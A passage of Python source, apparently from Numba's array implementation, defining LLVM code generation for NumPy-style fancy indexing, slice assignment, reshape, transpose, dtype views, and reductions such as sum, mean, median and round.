blocks...
"""
raise NotImplementedError
def get_size(self):
"""
Return this dimension's size as an integer.
"""
raise NotImplementedError
def get_shape(self):
"""
Return this dimension's shape as a tuple.
"""
raise NotImplementedError
def loop_head(self):
"""
        Start the indexing loop. Return an (index, count) tuple.
*index* is an integer LLVM value representing the index over this
dimension.
*count* is either an integer LLVM value representing the current
iteration count, or None if this dimension should be omitted from
the indexation result.
"""
raise NotImplementedError
def loop_tail(self):
"""
        Finish the indexing loop.
"""
raise NotImplementedError
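# The concrete indexers below are driven in this pattern (see
# FancyIndexer.begin_loops()/end_loops() further down):
#   indexer.prepare()
#   index, count = indexer.loop_head()
#   ...emit the loop body using `index`...
#   indexer.loop_tail()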
class EntireIndexer(Indexer):
"""
Compute indices along an entire array dimension.
"""
def __init__(self, context, builder, aryty, ary, dim):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.size = builder.extract_value(self.ary.shape, self.dim)
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.size
def get_shape(self):
return (self.size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
return cur_index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index),
self.context.get_constant(types.intp, 1))
builder.store(next_index, self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class IntegerIndexer(Indexer):
"""
Compute indices from a single integer.
"""
def __init__(self, context, builder, idx):
self.context = context
self.builder = builder
self.idx = idx
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
pass
def get_size(self):
return Constant.int(self.ll_intp, 1)
def get_shape(self):
return ()
def loop_head(self):
return self.idx, None
def loop_tail(self):
pass
class IntegerArrayIndexer(Indexer):
"""
Compute indices from an array of integer indices.
"""
def __init__(self, context, builder, idxty, idxary, size):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
self.size = size
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.idx_size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.idx_size
def get_shape(self):
return (self.idx_size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.idx_size),
likely=False):
builder.branch(self.bb_end)
# Load the actual index from the array of indices
index = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
index = fix_integer_index(self.context, builder,
self.idxty.dtype, index, self.size)
return index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.idx_index),
Constant.int(self.ll_intp, 1))
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class BooleanArrayIndexer(Indexer):
"""
Compute indices from an array of boolean predicates.
"""
def __init__(self, context, builder, idxty, idxary):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
self.size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_tail = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
builder = self.builder
count = cgutils.alloca_once_value(builder, self.zero)
# Sum all true values
with cgutils.for_range(builder, self.size) as loop:
c = builder.load(count)
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
loop.index, wraparound=False)
c = builder.add(c, builder.zext(pred, c.type))
builder.store(c, count)
return builder.load(count)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.zero, self.idx_index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
cur_count = builder.load(self.count)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
# Load the predicate and branch if false
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
with builder.if_then(builder.not_(pred)):
builder.branch(self.bb_tail)
# Increment the count for next iteration
next_count = builder.add(cur_count, self.one)
builder.store(next_count, self.count)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
builder.branch(self.bb_tail)
builder.position_at_end(self.bb_tail)
next_index = builder.add(builder.load(self.idx_index), self.one)
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class SliceIndexer(Indexer):
"""
Compute indices along a slice.
"""
def __init__(self, context, builder, aryty, ary, dim, slice):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.slice = slice
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
# Fix slice for the dimension's size
self.dim_size = builder.extract_value(self.ary.shape, self.dim)
cgutils.guard_invalid_slice(self.context, builder, self.slice)
slicing.fix_slice(builder, self.slice, self.dim_size)
self.is_step_negative = cgutils.is_neg_int(builder, self.slice.step)
# Create loop entities
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return slicing.get_slice_length(self.builder, self.slice)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.slice.start, self.index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
cur_count = builder.load(self.count)
is_finished = builder.select(self.is_step_negative,
builder.icmp_signed('<=', cur_index,
self.slice.stop),
builder.icmp_signed('>=', cur_index,
self.slice.stop))
with builder.if_then(is_finished, likely=False):
builder.branch(self.bb_end)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index), self.slice.step)
builder.store(next_index, self.index)
next_count = builder.add(builder.load(self.count), self.one)
builder.store(next_count, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class FancyIndexer(object):
"""
Perform fancy indexing on the given array.
"""
def __init__(self, context, builder, aryty, ary, index_types, indices):
self.context = context
self.builder = builder
        self.aryty = aryty
self.shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
self.strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
indexers = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
                # Fill up missing dimensions in the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
indexer = SliceIndexer(context, builder, aryty, ary, ax, slice)
indexers.append(indexer)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
self.shapes[ax])
indexer = IntegerIndexer(context, builder, ind)
indexers.append(indexer)
elif isinstance(idxty, types.Array):
idxary = make_array(idxty)(context, builder, indexval)
if isinstance(idxty.dtype, types.Integer):
indexer = IntegerArrayIndexer(context, builder,
idxty, idxary,
self.shapes[ax])
elif isinstance(idxty.dtype, types.Boolean):
indexer = BooleanArrayIndexer(context, builder,
idxty, idxary)
else:
assert 0
indexers.append(indexer)
else:
raise AssertionError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim, (ax, aryty.ndim)
while ax < aryty.ndim:
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
assert len(indexers) == aryty.ndim, (len(indexers), aryty.ndim)
self.indexers = indexers
def prepare(self):
for i in self.indexers:
i.prepare()
def get_shape(self):
"""
Get the resulting shape as Python tuple.
"""
return sum([i.get_shape() for i in self.indexers], ())
def begin_loops(self):
indices, counts = zip(*(i.loop_head() for i in self.indexers))
return indices, counts
def end_loops(self):
for i in reversed(self.indexers):
i.loop_tail()
def fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices):
shapes = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
# Construct output array
out_ty = sig.return_type
out_shapes = indexer.get_shape()
out = _empty_nd_impl(context, builder, out_ty, out_shapes)
out_data = out.data
out_idx = cgutils.alloca_once_value(builder,
context.get_constant(types.intp, 0))
# Loop on source and copy to destination
indices, _ = indexer.begin_loops()
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
ptr = cgutils.get_item_pointer2(builder, data, shapes, strides,
aryty.layout, indices, wraparound=False)
val = load_item(context, builder, aryty, ptr)
# Since the destination is C-contiguous, no need for multi-dimensional
# indexing.
cur = builder.load(out_idx)
ptr = builder.gep(out_data, [cur])
store_item(context, builder, out_ty, val, ptr)
next_idx = builder.add(cur, context.get_constant(types.intp, 1))
builder.store(next_idx, out_idx)
indexer.end_loops()
return impl_ret_new_ref(context, builder, out_ty, out._getvalue())
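# NumPy-level behaviour being implemented here (illustrative): fancy
# indexing always copies into a fresh C-contiguous array, e.g.
#   >>> a = numpy.arange(9).reshape(3, 3)
#   >>> a[numpy.array([0, 2])].flags['C_CONTIGUOUS']
#   True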
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Array))
def fancy_getitem_array(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
out_ty = sig.return_type
return fancy_getitem(context, builder, sig, args,
aryty, ary, (idxty,), (idx,))
def fancy_setslice(context, builder, sig, args, index_types, indices):
"""
Implement slice assignment for arrays. This implementation works for
basic as well as fancy indexing, since there's no functional difference
between the two for indexed assignment.
"""
aryty, _, srcty = sig.args
ary, _, src = args
ary = make_array(aryty)(context, builder, ary)
dest_shapes = cgutils.unpack_tuple(builder, ary.shape)
dest_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_data = ary.data
indexer = FancyIndexer(context, builder, aryty, ary,
index_types, indices)
indexer.prepare()
if isinstance(srcty, types.Buffer):
# Source is an array
src = make_array(srcty)(context, builder, src)
src_shapes = cgutils.unpack_tuple(builder, src.shape)
src_strides = cgutils.unpack_tuple(builder, src.strides)
src_data = src.data
src_dtype = srcty.dtype
# Check shapes are equal
index_shape = indexer.get_shape()
shape_error = cgutils.false_bit
assert len(index_shape) == len(src_shapes)
for u, v in zip(src_shapes, index_shape):
shape_error = builder.or_(shape_error,
builder.icmp_signed('!=', u, v))
with builder.if_then(shape_error, likely=False):
msg = "cannot assign slice from input of different size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
def src_getitem(source_indices):
assert len(source_indices) == srcty.ndim
src_ptr = cgutils.get_item_pointer2(builder, src_data,
src_shapes, src_strides,
srcty.layout, source_indices,
wraparound=False)
return load_item(context, builder, srcty, src_ptr)
else:
# Source is a scalar (broadcast or not, depending on destination
# shape).
src_dtype = srcty
def src_getitem(source_indices):
return src
# Loop on destination and copy from source to destination
dest_indices, counts = indexer.begin_loops()
# Source is iterated in natural order
source_indices = tuple(c for c in counts if c is not None)
val = src_getitem(source_indices)
    # Cast to the destination dtype (cross-dtype slice assignment is allowed)
val = context.cast(builder, val, src_dtype, aryty.dtype)
# No need to check for wraparound, as the indexers all ensure
# a positive index is returned.
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
dest_shapes, dest_strides,
aryty.layout, dest_indices,
wraparound=False)
store_item(context, builder, aryty, val, dest_ptr)
indexer.end_loops()
return context.get_dummy_value()
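# Behaviour sketch (illustrative): scalar sources are broadcast over the
# indexed region, while array sources must match the index shape exactly
# (no array broadcasting here), e.g.
#   a[1:3] = 0    # fine: scalar broadcast
#   a[1:3] = b    # requires b.shape == a[1:3].shape, else ValueError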
#-------------------------------------------------------------------------------
# Shape / layout altering
@builtin
@implement('array.transpose', types.Kind(types.Array))
def array_transpose(context, builder, sig, args):
return array_T(context, builder, sig.args[0], args[0])
def array_T(context, builder, typ, value):
if typ.ndim <= 1:
res = value
else:
ary = make_array(typ)(context, builder, value)
ret = make_array(typ)(context, builder)
shapes = cgutils.unpack_tuple(builder, ary.shape, typ.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, typ.ndim)
populate_array(ret,
data=ary.data,
shape=cgutils.pack_array(builder, shapes[::-1]),
strides=cgutils.pack_array(builder, strides[::-1]),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
builtin_attr(impl_attribute(types.Kind(types.Array), 'T')(array_T))
def _attempt_nocopy_reshape(context, builder, aryty, ary, newnd, newshape,
newstrides):
"""
Call into Numba_attempt_nocopy_reshape() for the given array type
and instance, and the specified new shape. The array pointed to
by *newstrides* will be filled up if successful.
"""
ll_intp = context.get_value_type(types.intp)
ll_intp_star = ll_intp.as_pointer()
ll_intc = context.get_value_type(types.intc)
fnty = lc.Type.function(ll_intc, [ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intp_star, ll_intp_star,
ll_intp, ll_intc])
fn = builder.module.get_or_insert_function(
fnty, name="numba_attempt_nocopy_reshape")
nd = lc.Constant.int(ll_intp, aryty.ndim)
shape = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'), 0, 0)
strides = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('strides'), 0, 0)
newnd = lc.Constant.int(ll_intp, newnd)
newshape = cgutils.gep_inbounds(builder, newshape, 0, 0)
newstrides = cgutils.gep_inbounds(builder, newstrides, 0, 0)
is_f_order = lc.Constant.int(ll_intc, 0)
res = builder.call(fn, [nd, shape, strides,
newnd, newshape, newstrides,
ary.itemsize, is_f_order])
return res
@builtin
@implement('array.reshape', types.Kind(types.Array), types.Kind(types.BaseTuple))
def array_reshape(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
shapety = sig.args[1]
shape = args[1]
ll_intp = context.get_value_type(types.intp)
ll_shape = lc.Type.array(ll_intp, shapety.count)
ary = make_array(aryty)(context, builder, args[0])
# XXX unknown dimension (-1) is unhandled
# Check requested size
newsize = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, shape):
newsize = builder.mul(newsize, s)
size = lc.Constant.int(ll_intp, 1)
for s in cgutils.unpack_tuple(builder, ary.shape):
size = builder.mul(size, s)
fail = builder.icmp_unsigned('!=', size, newsize)
with builder.if_then(fail):
msg = "total size of new array must be unchanged"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
newnd = shapety.count
newshape = cgutils.alloca_once(builder, ll_shape)
builder.store(shape, newshape)
newstrides = cgutils.alloca_once(builder, ll_shape)
ok = _attempt_nocopy_reshape(context, builder, aryty, ary, newnd,
newshape, newstrides)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "incompatible shape for array"
context.call_conv.return_user_exc(builder, NotImplementedError, (msg,))
ret = make_array(retty)(context, builder)
populate_array(ret,
data=ary.data,
shape=builder.load(newshape),
strides=builder.load(newstrides),
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
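# Behaviour note (illustrative): reshape never copies here. If the
# existing strides cannot be rearranged for the new shape without a copy
# (e.g. reshaping a transposed, non-contiguous array), the
# NotImplementedError above is raised instead of falling back to a copy.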
def _change_dtype(context, builder, oldty, newty, ary):
"""
    Attempt to fix up *ary* for switching from *oldty* to *newty*,
    following Numpy's array_descr_set()
    (np/core/src/multiarray/getset.c): the array's shape and strides
    are adjusted for the new dtype.
    False is returned on failure, True on success.
"""
assert oldty.ndim == newty.ndim
assert oldty.layout == newty.layout
new_layout = ord(newty.layout)
any_layout = ord('A')
c_layout = ord('C')
f_layout = ord('F')
int8 = types.int8
def imp(nd, dims, strides, old_itemsize, new_itemsize, layout):
        # Attempt to update the layout due to a limitation of the Numba
        # type system.
if layout == any_layout:
# Test rightmost stride to be contiguous
if strides[-1] == old_itemsize:
# Process this as if it is C contiguous
layout = int8(c_layout)
# Test leftmost stride to be F contiguous
elif strides[0] == old_itemsize:
# Process this as if it is F contiguous
layout = int8(f_layout)
if old_itemsize != new_itemsize and (layout == any_layout or nd == 0):
return False
if layout == c_layout:
i = nd - 1
else:
i = 0
if new_itemsize < old_itemsize:
# If it is compatible, increase the size of the dimension
# at the end (or at the front if F-contiguous)
if (old_itemsize % new_itemsize) != 0:
return False
newdim = old_itemsize // new_itemsize
dims[i] *= newdim
strides[i] = new_itemsize
elif new_itemsize > old_itemsize:
# Determine if last (or first if F-contiguous) dimension
# is compatible
bytelength = dims[i] * old_itemsize
if (bytelength % new_itemsize) != 0:
return False
dims[i] = bytelength // new_itemsize
strides[i] = new_itemsize
else:
# Same item size: nothing to do (this also works for
# non-contiguous arrays).
pass
return True
old_itemsize = context.get_constant(types.intp,
get_itemsize(context, oldty))
new_itemsize = context.get_constant(types.intp,
get_itemsize(context, newty))
nd = context.get_constant(types.intp, newty.ndim)
shape_data = cgutils.gep_inbounds(builder, ary._get_ptr_by_name('shape'),
0, 0)
strides_data = cgutils.gep_inbounds(builder,
ary._get_ptr_by_name('strides'), 0, 0)
shape_strides_array_type = types.Array(dtype=types.intp, ndim=1, layout='C')
arycls = context.make_array(shape_strides_array_type)
shape_constant = cgutils.pack_array(builder,
[context.get_constant(types.intp,
newty.ndim)])
sizeof_intp = context.get_abi_sizeof(context.get_data_type(types.intp))
sizeof_intp = context.get_constant(types.intp, sizeof_intp)
strides_constant = cgutils.pack_array(builder, [sizeof_intp])
shape_ary = arycls(context, builder)
populate_array(shape_ary,
data=shape_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
strides_ary = arycls(context, builder)
populate_array(strides_ary,
data=strides_data,
shape=shape_constant,
strides=strides_constant,
itemsize=sizeof_intp,
meminfo=None)
shape = shape_ary._getvalue()
strides = strides_ary._getvalue()
args = [nd, shape, strides, old_itemsize, new_itemsize,
context.get_constant(types.int8, new_layout)]
sig = signature(types.boolean,
types.intp, # nd
shape_strides_array_type, # dims
shape_strides_array_type, # strides
types.intp, # old_itemsize
types.intp, # new_itemsize
types.int8, # layout
)
res = context.compile_internal(builder, imp, sig, args)
update_array_info(newty, ary)
res = impl_ret_borrowed(context, builder, sig.return_type, res)
return res
@builtin
@implement('array.view', types.Kind(types.Array), types.Kind(types.DTypeSpec))
def array_view(context, builder, sig, args):
aryty = sig.args[0]
retty = sig.return_type
ary = make_array(aryty)(context, builder, args[0])
ret = make_array(retty)(context, builder)
# Copy all fields, casting the "data" pointer appropriately
fields = set(ret._datamodel._fields)
for k in sorted(fields):
val = getattr(ary, k)
if k == 'data':
ptrty = ret.data.type
ret.data = builder.bitcast(val, ptrty)
else:
setattr(ret, k, val)
ok = _change_dtype(context, builder, aryty, retty, ret)
fail = builder.icmp_unsigned('==', ok, lc.Constant.int(ok.type, 0))
with builder.if_then(fail):
msg = "new type not compatible with array"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
res = ret._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
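# NumPy-level behaviour being implemented here (illustrative):
#   >>> a = numpy.zeros(4, dtype=numpy.int32)
#   >>> a.view(numpy.int16).shape
#   (8,)
#   >>> a.view(numpy.int64).shape
#   (2,)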
#-------------------------------------------------------------------------------
# Computations
@builtin
@implement(numpy.sum, types.Kind(types.Array))
@implement("array.sum", types.Kind(types.Array))
def array_sum(context, builder, sig, args):
zero = sig.return_type(0)
def array_sum_impl(arr):
c = zero
for v in arr.flat:
c += v
return c
res = context.compile_internal(builder, array_sum_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.prod, types.Kind(types.Array))
@implement("array.prod", types.Kind(types.Array))
def array_prod(context, builder, sig, args):
def array_prod_impl(arr):
c = 1
for v in arr.flat:
c *= v
return c
res = context.compile_internal(builder, array_prod_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumsum, types.Kind(types.Array))
@implement("array.cumsum", types.Kind(types.Array))
def array_cumsum(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
zero = scalar_dtype(0)
def array_cumsum_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = zero
for idx, v in enumerate(arr.flat):
c += v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumsum_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.cumprod, types.Kind(types.Array))
@implement("array.cumprod", types.Kind(types.Array))
def array_cumprod(context, builder, sig, args):
scalar_dtype = sig.return_type.dtype
dtype = as_dtype(scalar_dtype)
def array_cumprod_impl(arr):
size = 1
for i in arr.shape:
size = size * i
out = numpy.empty(size, dtype)
c = 1
for idx, v in enumerate(arr.flat):
c *= v
out[idx] = c
return out
res = context.compile_internal(builder, array_cumprod_impl, sig, args,
locals=dict(c=scalar_dtype))
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.mean, types.Kind(types.Array))
@implement("array.mean", types.Kind(types.Array))
def array_mean(context, builder, sig, args):
zero = sig.return_type(0)
def array_mean_impl(arr):
# Can't use the naive `arr.sum() / arr.size`, as it would return
# a wrong result on integer sum overflow.
c = zero
for v in arr.flat:
c += v
return c / arr.size
res = context.compile_internal(builder, array_mean_impl, sig, args,
locals=dict(c=sig.return_type))
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.var, types.Kind(types.Array))
@implement("array.var", types.Kind(types.Array))
def array_var(context, builder, sig, args):
def array_var_impl(arry):
# Compute the mean
m = arry.mean()
# Compute the sum of square diffs
ssd = 0
for v in arry.flat:
ssd += (v - m) ** 2
return ssd / arry.size
res = context.compile_internal(builder, array_var_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.std, types.Kind(types.Array))
@implement("array.std", types.Kind(types.Array))
def array_std(context, builder, sig, args):
def array_std_impl(arry):
return arry.var() ** 0.5
res = context.compile_internal(builder, array_std_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.min, types.Kind(types.Array))
@implement("array.min", types.Kind(types.Array))
def array_min(context, builder, sig, args):
ty = sig.args[0].dtype
if isinstance(ty, (types.NPDatetime, types.NPTimedelta)):
# NaT is smaller than every other value, but it is
# ignored as far as min() is concerned.
nat = ty('NaT')
def array_min_impl(arry):
min_value = nat
it = arry.flat
for v in it:
if v != nat:
min_value = v
break
for v in it:
if v != nat and v < min_value:
min_value = v
return min_value
else:
def array_min_impl(arry):
for v in arry.flat:
min_value = v
break
for v in arry.flat:
if v < min_value:
min_value = v
return min_value
res = context.compile_internal(builder, array_min_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.max, types.Kind(types.Array))
@implement("array.max", types.Kind(types.Array))
def array_max(context, builder, sig, args):
def array_max_impl(arry):
for v in arry.flat:
max_value = v
break
for v in arry.flat:
if v > max_value:
max_value = v
return max_value
res = context.compile_internal(builder, array_max_impl, sig, args)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmin, types.Kind(types.Array))
@implement("array.argmin", types.Kind(types.Array))
def array_argmin(context, builder, sig, args):
ty = sig.args[0].dtype
# NOTE: Under Numpy < 1.10, argmin() is inconsistent with min() on NaT values:
# https://github.com/numpy/numpy/issues/6030
if (numpy_version >= (1, 10) and
isinstance(ty, (types.NPDatetime, types.NPTimedelta))):
# NaT is smaller than every other value, but it is
# ignored as far as argmin() is concerned.
nat = ty('NaT')
def array_argmin_impl(arry):
min_value = nat
min_idx = 0
it = arry.flat
idx = 0
for v in it:
if v != nat:
min_value = v
min_idx = idx
idx += 1
break
idx += 1
for v in it:
if v != nat and v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
else:
def array_argmin_impl(arry):
for v in arry.flat:
min_value = v
min_idx = 0
break
idx = 0
for v in arry.flat:
if v < min_value:
min_value = v
min_idx = idx
idx += 1
return min_idx
res = context.compile_internal(builder, array_argmin_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.argmax, types.Kind(types.Array))
@implement("array.argmax", types.Kind(types.Array))
def array_argmax(context, builder, sig, args):
def array_argmax_impl(arry):
for v in arry.flat:
max_value = v
max_idx = 0
break
idx = 0
for v in arry.flat:
if v > max_value:
max_value = v
max_idx = idx
idx += 1
return max_idx
res = context.compile_internal(builder, array_argmax_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.median, types.Kind(types.Array))
def array_median(context, builder, sig, args):
def partition(A, low, high):
mid = (low+high) // 2
# median of three {low, middle, high}
LM = A[low] <= A[mid]
MH = A[mid] <= A[high]
LH = A[low] <= A[high]
if LM == MH:
median3 = mid
elif LH != LM:
median3 = low
else:
median3 = high
# choose median3 as the pivot
A[high], A[median3] = A[median3], A[high]
x = A[high]
i = low
for j in range(low, high):
if A[j] <= x:
A[i], A[j] = A[j], A[i]
i += 1
A[i], A[high] = A[high], A[i]
return i
sig_partition = typing.signature(types.intp, *(sig.args[0], types.intp, types.intp))
_partition = context.compile_subroutine(builder, partition, sig_partition)
def select(arry, k):
n = arry.shape[0]
        # XXX: assuming a flat array until array.flatten is implemented
# temp_arry = arry.flatten()
temp_arry = arry.copy()
high = n-1
low = 0
# NOTE: high is inclusive
i = _partition(temp_arry, low, high)
while i != k:
if i < k:
low = i+1
i = _partition(temp_arry, low, high)
else:
high = i-1
i = _partition(temp_arry, low, high)
return temp_arry[k]
sig_select = typing.signature(sig.args[0].dtype, *(sig.args[0], types.intp))
_select = context.compile_subroutine(builder, select, sig_select)
def median(arry):
n = arry.shape[0]
if n % 2 == 0:
return (_select(arry, n//2 - 1) + _select(arry, n//2))/2
else:
return _select(arry, n//2)
res = context.compile_internal(builder, median, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
def _np_round_intrinsic(tp):
# np.round() always rounds half to even
return "llvm.rint.f%d" % (tp.bitwidth,)
def _np_round_float(context, builder, tp, val):
llty = context.get_value_type(tp)
module = builder.module
fnty = lc.Type.function(llty, [llty])
fn = module.get_or_insert_function(fnty, name=_np_round_intrinsic(tp))
return builder.call(fn, (val,))
@builtin
@implement(numpy.round, types.Kind(types.Float))
def scalar_round_unary(context, builder, sig, args):
res = _np_round_float(context, builder, sig.args[0], args[0])
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Integer))
def scalar_round_unary_integer(context, builder, sig, args):
res = args[0]
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex))
def scalar_round_unary_complex(context, builder, sig, args):
fltty = sig.args[0].underlying_float
cplx_cls = context.make_complex(sig.args[0])
z = cplx_cls(context, builder, args[0])
z.real = _np_round_float(context, builder, fltty, z.real)
z.imag = _np_round_float(context, builder, fltty, z.imag)
res = z._getvalue()
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Float), types.Kind(types.Integer))
@implement(numpy.round, types.Kind(types.Integer), types.Kind(types.Integer))
def scalar_round_binary_float(context, builder, sig, args):
def round_ndigits(x, ndigits):
if math.isinf(x) or math.isnan(x):
return x
# NOTE: this is CPython's algorithm, but perhaps this is overkill
# when emulating Numpy's behaviour.
if ndigits >= 0:
if ndigits > 22:
# pow1 and pow2 are each safe from overflow, but
# pow1*pow2 ~= pow(10.0, ndigits) might overflow.
pow1 = 10.0 ** (ndigits - 22)
pow2 = 1e22
else:
pow1 = 10.0 ** ndigits
pow2 = 1.0
y = (x * pow1) * pow2
if math.isinf(y):
return x
return (numpy.round(y) / pow2) / pow1
else:
pow1 = 10.0 ** (-ndigits)
y = x / pow1
return numpy.round(y) * pow1
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Complex), types.Kind(types.Integer))
def scalar_round_binary_complex(context, builder, sig, args):
def round_ndigits(z, ndigits):
return complex(numpy.round(z.real, ndigits),
numpy.round(z.imag, ndigits))
res = context.compile_internal(builder, round_ndigits, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.round, types.Kind(types.Array), types.Kind(types.Integer),
types.Kind(types.Array))
def array_round(context, builder, sig, args):
def array_round_impl(arr, decimals, out):
if arr.shape != out.shape:
raise ValueError("invalid output shape")
